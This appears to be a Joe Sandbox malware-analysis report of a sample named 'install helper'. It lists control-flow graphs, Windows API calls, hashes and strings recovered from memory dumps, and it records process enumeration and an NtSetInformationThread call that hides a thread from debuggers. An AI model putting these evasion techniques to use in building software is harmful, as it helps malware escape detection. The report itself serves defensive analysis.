                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID: gF:E$hF:E$hF:E
                                                                                                                • API String ID: 2295610775-4234190611
                                                                                                                • Opcode ID: 380d92ee699a32462a56ae22175e4fde40c91d89463f2abd84a66f8f49f25b13
                                                                                                                • Instruction ID: 3e0d21a4528d51e60ebdc2b20f3e40218cfe65b04958100feacd22f23aa5739d
                                                                                                                • Opcode Fuzzy Hash: 380d92ee699a32462a56ae22175e4fde40c91d89463f2abd84a66f8f49f25b13
                                                                                                                • Instruction Fuzzy Hash: CF116D781093429FDB158F29D444A5ABBF4BB85314F568E59F4A9C7AD1D330CD88CB12

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4774 6c974050-6c974085 CreateToolhelp32Snapshot 4775 6c9740c0-6c9740c9 4774->4775 4776 6c974110-6c974115 4775->4776 4777 6c9740cb-6c9740d0 4775->4777 4780 6c974087-6c9740b1 call 6c981a25 4776->4780 4781 6c97411b-6c974120 4776->4781 4778 6c9740d2-6c9740d7 4777->4778 4779 6c974148-6c97414d 4777->4779 4785 6c97417f-6c974190 4778->4785 4786 6c9740dd-6c9740e2 4778->4786 4782 6c97414f-6c97417d call 6c97a740 Process32FirstW 4779->4782 4783 6c9741bc-6c9741c1 4779->4783 4780->4775 4787 6c974195-6c9741a2 Process32NextW 4781->4787 4788 6c974122-6c974127 4781->4788 4792 6c9741a7-6c9741b7 4782->4792 4783->4775 4793 6c9741c7-6c9741d5 4783->4793 4785->4775 4786->4775 4794 6c9740e4-6c9740ff CloseHandle 4786->4794 4787->4792 4788->4775 4789 6c974129-6c974143 4788->4789 4789->4775 4792->4775 4794->4775
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C97405E
                                                                                                                • CloseHandle.KERNEL32(?), ref: 6C9740EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                                                • String ID:
                                                                                                                • API String ID: 3280610774-0
                                                                                                                • Opcode ID: 3ddcd6e3fb1ee48e48edc71fd448f9e0a26e1eaba21c09de457994f0232808f4
                                                                                                                • Instruction ID: d71810e8850aa828068b4ff91c4a9b6163fcfc6c2c704d0a61926bba864ca14b
                                                                                                                • Opcode Fuzzy Hash: 3ddcd6e3fb1ee48e48edc71fd448f9e0a26e1eaba21c09de457994f0232808f4
                                                                                                                • Instruction Fuzzy Hash: CE315D7464A301DFD720DF68C88874ABBE8FB99314F104A19E498D37A1D335D954DF62

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4918 6c7f3886-6c7f388e 4919 6c7f3894-6c7f3896 4918->4919 4920 6c7f3970-6c7f397d 4918->4920 4919->4920 4921 6c7f389c-6c7f38b9 4919->4921 4922 6c7f397f-6c7f3989 4920->4922 4923 6c7f39f1-6c7f39f8 4920->4923 4924 6c7f38c0-6c7f38c1 4921->4924 4922->4921 4925 6c7f398f-6c7f3994 4922->4925 4926 6c7f39fe-6c7f3a03 4923->4926 4927 6c7f3ab5-6c7f3aba 4923->4927 4930 6c7f395e 4924->4930 4932 6c7f399a-6c7f399f 4925->4932 4933 6c7f3b16-6c7f3b18 4925->4933 4928 6c7f3a09-6c7f3a2f 4926->4928 4929 6c7f38d2-6c7f38d4 4926->4929 4927->4921 4931 6c7f3ac0-6c7f3ac7 4927->4931 4934 6c7f38f8-6c7f3955 4928->4934 4935 6c7f3a35-6c7f3a3a 4928->4935 4936 6c7f3957-6c7f395c 4929->4936 4937 6c7f3960-6c7f3964 4930->4937 4931->4924 4938 6c7f3acd-6c7f3ad6 4931->4938 4939 6c7f383b-6c7f3855 call 6c9418a0 call 6c9418b0 4932->4939 4940 6c7f39a5-6c7f39bf 4932->4940 4933->4924 4934->4936 4941 6c7f3b1d-6c7f3b22 4935->4941 4942 6c7f3a40-6c7f3a57 4935->4942 4936->4930 4944 6c7f396a 4937->4944 4945 6c7f3860-6c7f3885 4937->4945 4938->4933 4946 6c7f3ad8-6c7f3aeb 4938->4946 4939->4945 4947 6c7f3a5a-6c7f3a5d 4940->4947 4953 6c7f3b49-6c7f3b50 4941->4953 4954 6c7f3b24-6c7f3b44 4941->4954 4942->4947 4950 6c7f3ba1-6c7f3bb6 4944->4950 4945->4918 4946->4934 4951 6c7f3af1-6c7f3af8 4946->4951 4948 6c7f3aa9-6c7f3ab0 4947->4948 4948->4937 4956 6c7f3bc0-6c7f3bda call 6c9418a0 call 6c9418b0 4950->4956 4958 6c7f3afa-6c7f3aff 4951->4958 4959 6c7f3b62-6c7f3b85 4951->4959 4953->4924 4955 6c7f3b56-6c7f3b5d 4953->4955 4954->4948 4955->4937 4969 6c7f3be0-6c7f3bfe 4956->4969 4958->4936 4959->4934 4962 6c7f3b8b 4959->4962 4962->4950 4972 6c7f3e7b 4969->4972 4973 6c7f3c04-6c7f3c11 4969->4973 4974 6c7f3e81-6c7f3ee0 call 6c7f3750 GetCurrentThread NtSetInformationThread 4972->4974 4975 6c7f3c17-6c7f3c20 4973->4975 4976 6c7f3ce0-6c7f3cea 4973->4976 4991 6c7f3eea-6c7f3f04 call 6c9418a0 call 6c9418b0 4974->4991 4980 6c7f3c26-6c7f3c2d 4975->4980 4981 6c7f3dc5 4975->4981 4978 6c7f3cec-6c7f3d0c 4976->4978 4979 6c7f3d3a-6c7f3d3c 4976->4979 4985 6c7f3d90-6c7f3d95 4978->4985 4986 6c7f3d3e-6c7f3d45 4979->4986 4987 6c7f3d70-6c7f3d8d 4979->4987 4982 6c7f3dc3 4980->4982 4983 6c7f3c33-6c7f3c3a 4980->4983 4988 6c7f3dc6 4981->4988 4982->4981 4989 6c7f3e26-6c7f3e2b 4983->4989 4990 6c7f3c40-6c7f3c5b 4983->4990 4993 6c7f3dba-6c7f3dc1 4985->4993 4994 6c7f3d97-6c7f3db8 4985->4994 4992 6c7f3d50-6c7f3d57 4986->4992 4987->4985 4995 6c7f3dc8-6c7f3dcc 4988->4995 4996 6c7f3c7b-6c7f3cd0 4989->4996 4997 6c7f3e31 4989->4997 4998 6c7f3e1b-6c7f3e24 4990->4998 5012 6c7f3f75-6c7f3fa1 4991->5012 4992->4988 4993->4982 5000 6c7f3dd7-6c7f3ddc 4993->5000 4994->4981 4995->4969 5001 6c7f3dd2 4995->5001 4996->4992 4997->4956 4998->4995 5003 6c7f3e76-6c7f3e79 4998->5003 5004 6c7f3dde-6c7f3e17 5000->5004 5005 6c7f3e36-6c7f3e3d 5000->5005 5001->5003 5003->4974 5004->4998 5006 6c7f3e3f-6c7f3e5a 5005->5006 5007 6c7f3e5c-6c7f3e5f 5005->5007 5006->4998 5007->4996 5010 6c7f3e65-6c7f3e69 5007->5010 5010->4995 5010->5003 5016 6c7f3fa3-6c7f3fa8 5012->5016 5017 6c7f4020-6c7f4026 5012->5017 5020 6c7f3fae-6c7f3fcf 5016->5020 5021 6c7f407c-6c7f4081 5016->5021 5018 6c7f402c-6c7f403c 5017->5018 5019 6c7f3f06-6c7f3f35 5017->5019 5025 6c7f403e-6c7f4058 5018->5025 5026 6c7f40b3-6c7f40b8 5018->5026 5024 6c7f3f38-6c7f3f61 5019->5024 5022 6c7f40aa-6c7f40ae 5020->5022 5021->5022 5023 6c7f4083-6c7f408a 5021->5023 5027 6c7f3f6b-6c7f3f6f 5022->5027 5023->5024 5028 6c7f4090 5023->5028 5030 6c7f3f64-6c7f3f67 5024->5030 5031 6c7f405a-6c7f4063 5025->5031 5026->5020 5029 6c7f40be-6c7f40c9 5026->5029 5027->5012 5028->4991 5032 6c7f40a7 5028->5032 5029->5022 5033 6c7f40cb-6c7f40d4 5029->5033 5034 6c7f3f69 5030->5034 5035 6c7f4069-6c7f406c 5031->5035 5036 6c7f40f5-6c7f413f 5031->5036 5032->5022 5033->5032 5039 6c7f40d6-6c7f40f0 5033->5039 5034->5027 5037 6c7f4144-6c7f414b 5035->5037 5038 6c7f4072-6c7f4077 5035->5038 5036->5034 5037->5027 5038->5030 5039->5031
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c29e6f392ab53eb9e0159fd8caf0e0f22635c032402afed3cc20a7a152a3b3ce
                                                                                                                • Instruction ID: b67719d950401a58fc99ee16b22933ecefd0fb06a4f609bc03ef486b8ba4d58b
                                                                                                                • Opcode Fuzzy Hash: c29e6f392ab53eb9e0159fd8caf0e0f22635c032402afed3cc20a7a152a3b3ce
                                                                                                                • Instruction Fuzzy Hash: 3E32C032245B018FC324CF28C9D0696B7E3EF91314B698A6DC0BA4BB95D775B44BCB51
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2882836952-0
                                                                                                                • Opcode ID: 3f7f1cbd1905a7f4689991743278569ebbcec5b860ae881b138448018543e242
                                                                                                                • Instruction ID: 99c878b90a6a655831c0bd6d1a438829c9d3871c96043a9a25053188d1728d8c
                                                                                                                • Opcode Fuzzy Hash: 3f7f1cbd1905a7f4689991743278569ebbcec5b860ae881b138448018543e242
                                                                                                                • Instruction Fuzzy Hash: 8851CE325547018BC320CF28C9C0785B7A3BFA5314F698B5DC0BA5BB95DB74B44B9B92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2882836952-0
                                                                                                                • Opcode ID: 3de130bd4269549eedf86dd371ebc7b71527af04f7794acc8aacf9ed4e7d40db
                                                                                                                • Instruction ID: 1e3b02b012cd2b6dda9865dc1f0d71eecfe43a5b0a4f8a6e8c58cc8e9e7ba451
                                                                                                                • Opcode Fuzzy Hash: 3de130bd4269549eedf86dd371ebc7b71527af04f7794acc8aacf9ed4e7d40db
                                                                                                                • Instruction Fuzzy Hash: BD51CC31504B018BC320CF28C5C0795B7A3BFA6354F698B5DC0BA5BB95DB70B44B9B92
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 6C7F3E9D
                                                                                                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C7F3EAA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$CurrentInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 1650627709-0
                                                                                                                • Opcode ID: f29cb0efb1de1ca214b5db9753066778df22726c2b981dd2737f7c6d9cbe7915
                                                                                                                • Instruction ID: 7feda375c5fa61a3b39a235bc4ebe680defde933bbc1f468dba3e866262646c8
                                                                                                                • Opcode Fuzzy Hash: f29cb0efb1de1ca214b5db9753066778df22726c2b981dd2737f7c6d9cbe7915
                                                                                                                • Instruction Fuzzy Hash: CF310031655B01CBD320CF28C9D47C6B7A2BFA6314F298B5DC0B65BB81DB74700A9B62
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 6C7F3E9D
                                                                                                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C7F3EAA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$CurrentInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 1650627709-0
                                                                                                                • Opcode ID: 4ea12702a7613f88d192317f40e74224859c5b0ccfd9e62c2910a151229a5db6
                                                                                                                • Instruction ID: c0e2fddb9ada5273df0f57d84f3d1ff5686d0bf48ac7ec8958f9203b05737e1c
                                                                                                                • Opcode Fuzzy Hash: 4ea12702a7613f88d192317f40e74224859c5b0ccfd9e62c2910a151229a5db6
                                                                                                                • Instruction Fuzzy Hash: D8310F31114701CBD724CF28C6D4796B7A2BFA2304F284A5CC0BA4BB82DB71B046DB92
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 6C7F3E9D
                                                                                                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C7F3EAA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$CurrentInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 1650627709-0
                                                                                                                • Opcode ID: 5c2a7b6f1eba2c7d49cb479d98894b50bebcb8949150268e0fc5cece2a5f2184
                                                                                                                • Instruction ID: 5ff18cd03825bf68356b9e20417d3219a7c38c791974ccd0e5afb42ef5c18dfc
                                                                                                                • Opcode Fuzzy Hash: 5c2a7b6f1eba2c7d49cb479d98894b50bebcb8949150268e0fc5cece2a5f2184
                                                                                                                • Instruction Fuzzy Hash: C3212430118702CBD324CF24CAD479677B2BF52344F188B2DC0B68BB81DB74B0469B62
                                                                                                                APIs
                                                                                                                • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C973F40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1889721586-0
                                                                                                                • Opcode ID: 14a24c356ffa264b0b165b4219383f1c914cee6e7bfdf7e0dba62df4606fe32e
                                                                                                                • Instruction ID: 07abbcbda480d06650bda1fd9217cfd104e39264e7c6f8885c07bcc7cc6f88f5
                                                                                                                • Opcode Fuzzy Hash: 14a24c356ffa264b0b165b4219383f1c914cee6e7bfdf7e0dba62df4606fe32e
                                                                                                                • Instruction Fuzzy Hash: EA313674609342AFD711CF28C888A0ABBF5BF89794F14896EF488C7262C335D854CB63
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "OP$#OP$#OP$+duH$+duH$/+p8$/+p8$H$J\$J\$P$Rr!A$Sr!A$Sr!A$p
                                                                                                                • API String ID: 0-2001680094
                                                                                                                • Opcode ID: d360ad73146bf0c0d231e5a8b0deca56224d00aa79b634c5ae565214a31b4e02
                                                                                                                • Instruction ID: eb7cc68794c215e480a015da9439122806fc9086ddff5f51ebfb09f0e350bcd7
                                                                                                                • Opcode Fuzzy Hash: d360ad73146bf0c0d231e5a8b0deca56224d00aa79b634c5ae565214a31b4e02
                                                                                                                • Instruction Fuzzy Hash: D7A27BB460E3858FC724CE18C4906AEBBF2ABD9319F24CD2EE494C7755EA34D4468B53

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3914 6c98b8f3-6c98b903 3915 6c98b91d-6c98b91f 3914->3915 3916 6c98b905-6c98b918 call 6c97e7ff call 6c97e7ec 3914->3916 3918 6c98bc84-6c98bc91 call 6c97e7ff call 6c97e7ec 3915->3918 3919 6c98b925-6c98b92b 3915->3919 3932 6c98bc9c 3916->3932 3938 6c98bc97 call 6c97ef40 3918->3938 3919->3918 3922 6c98b931-6c98b957 3919->3922 3922->3918 3925 6c98b95d-6c98b966 3922->3925 3928 6c98b968-6c98b97b call 6c97e7ff call 6c97e7ec 3925->3928 3929 6c98b980-6c98b982 3925->3929 3928->3938 3930 6c98b988-6c98b98b 3929->3930 3931 6c98bc80-6c98bc82 3929->3931 3930->3931 3937 6c98b991-6c98b995 3930->3937 3935 6c98bc9f-6c98bca2 3931->3935 3932->3935 3937->3928 3940 6c98b997-6c98b9ae 3937->3940 3938->3932 3943 6c98b9ff-6c98ba05 3940->3943 3944 6c98b9b0-6c98b9b3 3940->3944 3945 6c98b9cb-6c98b9e2 call 6c97e7ff call 6c97e7ec call 6c97ef40 3943->3945 3946 6c98ba07-6c98ba11 3943->3946 3947 6c98b9c3-6c98b9c9 3944->3947 3948 6c98b9b5-6c98b9be 3944->3948 3978 6c98bbb7 3945->3978 3949 6c98ba18-6c98ba36 call 6c983615 call 6c9835db * 2 3946->3949 3950 6c98ba13-6c98ba15 3946->3950 3947->3945 3952 6c98b9e7-6c98b9fa 3947->3952 3951 6c98ba83-6c98ba93 3948->3951 3988 6c98ba38-6c98ba4e call 6c97e7ec call 6c97e7ff 3949->3988 3989 6c98ba53-6c98ba7c call 6c989a89 3949->3989 3950->3949 3954 6c98bb58-6c98bb61 call 6c990805 3951->3954 3955 6c98ba99-6c98baa5 3951->3955 3952->3951 3966 6c98bb63-6c98bb75 3954->3966 3967 6c98bbd4 3954->3967 3955->3954 3958 6c98baab-6c98baad 3955->3958 3958->3954 3963 6c98bab3-6c98bad7 3958->3963 3963->3954 3968 6c98bad9-6c98baef 3963->3968 3966->3967 3972 6c98bb77-6c98bb86 GetConsoleMode 3966->3972 3975 6c98bbd8-6c98bbf0 ReadFile 3967->3975 3968->3954 3973 6c98baf1-6c98baf3 3968->3973 3972->3967 3979 6c98bb88-6c98bb8c 3972->3979 3973->3954 3980 6c98baf5-6c98bb1b 3973->3980 3976 6c98bc4c-6c98bc57 GetLastError 3975->3976 3977 6c98bbf2-6c98bbf8 3975->3977 3982 6c98bc59-6c98bc6b call 6c97e7ec call 6c97e7ff 3976->3982 3983 6c98bc70-6c98bc73 3976->3983 3977->3976 3984 6c98bbfa 3977->3984 3986 6c98bbba-6c98bbc4 call 6c9835db 3978->3986 3979->3975 3985 6c98bb8e-6c98bba8 ReadConsoleW 3979->3985 3980->3954 3987 6c98bb1d-6c98bb33 3980->3987 3982->3978 3995 6c98bc79-6c98bc7b 3983->3995 3996 6c98bbb0-6c98bbb6 call 6c97e812 3983->3996 3991 6c98bbfd-6c98bc0f 3984->3991 3993 6c98bbc9-6c98bbd2 3985->3993 3994 6c98bbaa GetLastError 3985->3994 3986->3935 3987->3954 3998 6c98bb35-6c98bb37 3987->3998 3988->3978 3989->3951 3991->3986 4001 6c98bc11-6c98bc15 3991->4001 3993->3991 3994->3996 3995->3986 3996->3978 3998->3954 4005 6c98bb39-6c98bb53 3998->4005 4008 6c98bc2e-6c98bc39 4001->4008 4009 6c98bc17-6c98bc27 call 6c98bd1e 4001->4009 4005->3954 4015 6c98bc3b call 6c98bca3 4008->4015 4016 6c98bc45-6c98bc4a call 6c98bfd6 4008->4016 4020 6c98bc2a-6c98bc2c 4009->4020 4021 6c98bc40-6c98bc43 4015->4021 4016->4021 4020->3986 4021->4020
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8Q
                                                                                                                • API String ID: 0-4022487301
